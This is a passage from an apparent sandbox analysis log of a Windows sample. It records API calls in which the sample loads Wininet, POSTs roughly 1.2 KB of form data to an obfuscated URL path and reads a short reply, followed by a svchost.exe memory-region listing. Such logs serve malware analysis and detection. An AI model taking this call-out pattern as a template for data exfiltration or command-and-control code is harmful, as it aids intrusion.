hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca20 | out: hHeap=0x4780000) returned 1 [0310.068] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0310.068] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb40 | out: hHeap=0x4780000) returned 1 [0310.068] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c9c0 [0310.068] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef2f8 [0310.068] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef2f8 | out: hHeap=0x4780000) returned 1 [0310.068] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0310.068] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef078 [0310.068] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0310.068] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef2f8 [0310.068] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0310.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0310.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0310.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0310.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0310.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0310.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0310.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0310.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0310.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca50 [0310.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0310.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca20 [0310.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca50 | out: hHeap=0x4780000) returned 1 [0310.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0310.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca20 | out: hHeap=0x4780000) returned 1 [0310.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ca20 [0310.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef410 [0310.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef410 | out: hHeap=0x4780000) returned 1 [0310.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0310.070] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0310.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0310.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0310.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0310.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0310.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0310.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0310.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0310.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0310.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0310.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca68 [0310.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0310.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb28 [0310.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca68 | out: hHeap=0x4780000) returned 1 [0310.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0310.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0310.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eefd8 [0310.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0310.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0310.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eefd8 | out: hHeap=0x4780000) returned 1 [0310.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef0c8 [0310.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0310.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef398 [0310.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0310.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0310.072] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0310.072] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0310.073] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef398 | out: hHeap=0x4780000) returned 1 [0310.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0310.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0310.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0310.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0310.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0310.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0310.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0310.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0310.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0310.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cb28 [0310.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0310.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca68 [0310.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0310.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0310.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca68 | out: hHeap=0x4780000) returned 1 [0310.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef0f0 [0310.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0310.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0310.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef0f0 | out: hHeap=0x4780000) returned 1 [0310.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef0f0 [0310.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0310.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef398 [0310.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0310.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0310.096] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0310.096] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0311.208] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef398 | out: hHeap=0x4780000) returned 1 [0311.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0311.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0311.208] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0311.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0311.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0311.208] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0311.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0311.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0311.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0311.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0311.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0311.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0311.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c900 [0311.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0311.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb28 [0311.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c900 | out: hHeap=0x4780000) returned 1 [0311.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0311.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0311.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef398 [0311.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0311.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0311.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef398 | out: hHeap=0x4780000) returned 1 [0311.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef398 [0311.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0311.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef3c0 [0311.210] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0311.210] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0311.210] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0311.210] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0311.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef3c0 | out: hHeap=0x4780000) returned 1 [0311.211] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0311.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0311.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 Thread: id = 107 os_tid = 0x1094 Thread: id = 108 os_tid = 0x1090 [0147.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x3bc) returned 0x47bb530 [0147.632] GetCurrentThreadId () returned 0x1090 Thread: id = 109 os_tid = 0xbe8 [0147.907] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x3bc) returned 0x47c3760 [0147.907] GetCurrentThreadId () returned 0xbe8 Thread: id = 110 os_tid = 0x1084 [0148.206] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x3bc) returned 0x47cdf30 [0148.206] GetCurrentThreadId () returned 0x1084 Thread: id = 111 os_tid = 0x3b8 Thread: id = 112 os_tid = 0x1080 [0148.919] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x3bc) returned 0x47ec888 [0148.919] GetCurrentThreadId () returned 0x1080 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x510bc000" os_pid = "0x390" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c87e" [0xc000000f], "LOCAL" [0x7] Region: id = 1334 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1335 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1336 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1337 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1338 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1339 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1340 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1341 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1342 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1343 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1344 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1345 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1346 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1347 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1348 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1349 start_va = 0x550000 end_va = 0x556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1350 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1351 start_va = 0x570000 end_va = 0x576fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1352 start_va = 0x580000 end_va = 0x5e3fff monitored = 0 entry_point = 0x595ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1353 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1354 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1355 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1356 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1357 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 1358 start_va = 0xb20000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 1359 start_va = 0xba0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 1360 start_va = 0xc20000 end_va = 0xc26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 1361 start_va = 0xc30000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 1362 start_va = 0xcb0000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 1363 start_va = 0xcd0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 1364 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1365 start_va = 0xd00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 1366 start_va = 0xf00000 end_va = 0xf00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 1367 start_va = 0xf10000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 1368 start_va = 0xf90000 end_va = 0xf90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 1369 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 1370 start_va = 0x1120000 end_va = 0x1126fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 1371 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1372 start_va = 0x1300000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1373 start_va = 0x1380000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 1374 start_va = 0x1400000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 1375 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 1376 start_va = 0x1500000 end_va = 0x157ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 1377 start_va = 0x1590000 end_va = 0x168ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 1378 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 1379 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 1380 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1381 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1382 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 1383 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 1384 start_va = 0x1d00000 end_va = 0x2036fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1385 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 1386 start_va = 0x2140000 end_va = 0x221ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1387 start_va = 0x2220000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 1388 start_va = 0x2320000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1389 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1390 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1391 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1392 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1393 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1394 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 1395 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 1396 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1397 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 1398 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1399 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 1400 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 1401 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1402 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 1403 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 1404 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1405 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1406 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1407 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1408 start_va = 0x7ff681250000 end_va = 0x7ff68125cfff monitored = 0 entry_point = 0x7ff681253980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1409 start_va = 0x7ff9ff8c0000 end_va = 0x7ff9ff8f2fff monitored = 0 entry_point = 0x7ff9ff8cae20 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 1410 start_va = 0x7ffa07cc0000 end_va = 0x7ffa07cd3fff monitored = 0 entry_point = 0x7ffa07cc1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1411 start_va = 0x7ffa07ce0000 end_va = 0x7ffa07dd5fff monitored = 0 entry_point = 0x7ffa07d19590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1412 start_va = 0x7ffa08390000 end_va = 0x7ffa083a0fff monitored = 0 entry_point = 0x7ffa08392fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1413 start_va = 0x7ffa09490000 end_va = 0x7ffa0950efff monitored = 0 entry_point = 0x7ffa094a7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1414 start_va = 0x7ffa0b7a0000 end_va = 0x7ffa0b7aafff monitored = 0 entry_point = 0x7ffa0b7a1d30 region_type = 